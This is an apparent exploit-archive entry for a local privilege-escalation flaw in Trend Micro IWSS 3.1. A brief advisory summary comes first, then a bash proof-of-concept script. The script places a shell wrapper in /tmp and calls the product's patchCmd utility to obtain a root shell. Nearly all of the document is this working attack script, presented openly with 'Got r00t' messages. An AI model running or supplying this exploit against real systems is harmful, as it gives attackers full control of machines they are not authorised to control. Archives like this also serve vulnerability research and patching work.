18 lines
No EOL
652 B
Text
18 lines
No EOL
652 B
Text
source: http://www.securityfocus.com/bid/50380/info
|
|
|
|
Trendmicro IWSS is prone to a local privilege-escalation vulnerability.
|
|
|
|
Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.
|
|
|
|
Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected.
|
|
|
|
#!/bin/bash
|
|
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com
|
|
|
|
cd /tmp
|
|
echo "[*] Creating shell file"
|
|
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
|
|
echo "[*] Change permissions"
|
|
chmod 755 PatchExe.sh
|
|
echo "[*] Got r00t... Its free!"
|
|
/opt/trend/iwss/data/patch/bin/patchCmd u root |